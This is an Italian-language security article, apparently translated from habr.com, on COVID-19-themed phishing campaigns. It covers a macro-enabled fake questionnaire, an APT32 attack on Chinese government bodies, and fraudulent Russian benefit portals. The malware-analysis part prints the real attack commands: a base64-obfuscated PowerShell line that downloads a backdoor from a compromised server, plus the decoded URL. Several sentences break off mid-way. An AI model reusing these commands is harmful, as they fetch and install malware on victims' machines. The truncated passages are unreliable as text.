Gli aggressori continuano a sfruttare l’argomento COVID-19, creando sempre più minacce per gli utenti fortemente interessati a tutto ciò che riguarda l’epidemia. IN
Ricorda dentro
Desideri un test gratuito per il COVID-19?
Un altro esempio significativo di phishing a tema coronavirus è stato
Anche convincere la maggior parte degli utenti ad abilitare le macro è stato facile. Per fare ciò è stato utilizzato un trucco standard: per compilare il questionario è necessario prima abilitare le macro, il che significa che è necessario eseguire uno script VBA.
Come puoi vedere, lo script VBA è appositamente mascherato dagli antivirus.
Windows dispone di una funzione di attesa in cui l'applicazione attende /T <secondi> prima di accettare la risposta predefinita "Sì". Nel nostro caso, lo script ha atteso 65 secondi prima di eliminare i file temporanei:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
E durante l'attesa è stato scaricato il malware. A questo scopo è stato lanciato uno speciale script PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Dopo aver decodificato il valore Base64, lo script PowerShell scarica la backdoor situata sul server web precedentemente violato dalla Germania:
http://automatischer-staubsauger.com/feature/777777.png
e lo salva con il nome:
C:UsersPublictmpdirfile1.exe
Cartella ‘C:UsersPublictmpdir’
viene eliminato durante l'esecuzione del file 'tmps1.bat' che contiene il comando cmd /c mkdir ""C:UsersPublictmpdir"".
Attacco mirato alle agenzie governative
Inoltre, gli analisti di FireEye hanno recentemente segnalato un attacco APT32 mirato contro le strutture governative di Wuhan, nonché contro il Ministero cinese per la gestione delle emergenze. Uno degli RTF distribuiti conteneva un collegamento a un articolo del New York Times intitolato
È interessante notare che, al momento del rilevamento, nessuno degli antivirus ha rilevato questa istanza, secondo Virustotal.
Quando i siti Web ufficiali sono inattivi
L’esempio più eclatante di attacco phishing è avvenuto proprio l’altro giorno in Russia. La ragione di ciò è stata la nomina di un beneficio tanto atteso per i bambini dai 3 ai 16 anni. Quando il 12 maggio 2020 è stato annunciato l’inizio dell’accettazione delle domande, milioni di persone si sono precipitate sul sito web dei servizi statali per chiedere l’aiuto tanto atteso e hanno fatto crollare il portale non peggio di un attacco DDoS professionale. Quando il presidente ha affermato che “i servizi governativi non sarebbero in grado di far fronte al flusso di richieste”, la gente ha iniziato a parlare online del lancio di un sito alternativo per accettare le richieste.
Il problema è che diversi siti hanno iniziato a funzionare contemporaneamente e, mentre uno, quello vero su posobie16.gosuslugi.ru, accetta effettivamente domande, altri
I colleghi di SearchInform hanno trovato circa 30 nuovi domini fraudolenti nella zona .ru. Infosecurity e Softline Company hanno rintracciato più di 70 siti web simili di servizi governativi falsi dall'inizio di aprile. I loro creatori manipolano simboli familiari e usano anche combinazioni delle parole gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie e così via.
Hype e ingegneria sociale
Tutti questi esempi confermano solo che gli aggressori stanno monetizzando con successo il tema del coronavirus. E quanto più alta è la tensione sociale e quanto meno chiare sono le questioni, tanto maggiori sono le possibilità che i truffatori rubino dati importanti, costringano le persone a rinunciare ai propri soldi o semplicemente hackerano più computer.
E poiché la pandemia ha costretto persone potenzialmente impreparate a lavorare in massa da casa, non solo i dati personali, ma anche quelli aziendali sono a rischio. Recentemente, ad esempio, anche gli utenti di Microsoft 365 (ex Office 365) sono stati vittime di un attacco di phishing. Le persone ricevevano enormi quantità di messaggi vocali "persi" come allegati alle lettere. Tuttavia, i file erano in realtà una pagina HTML a cui venivano indirizzate le vittime dell'attacco
Fonte: habr.com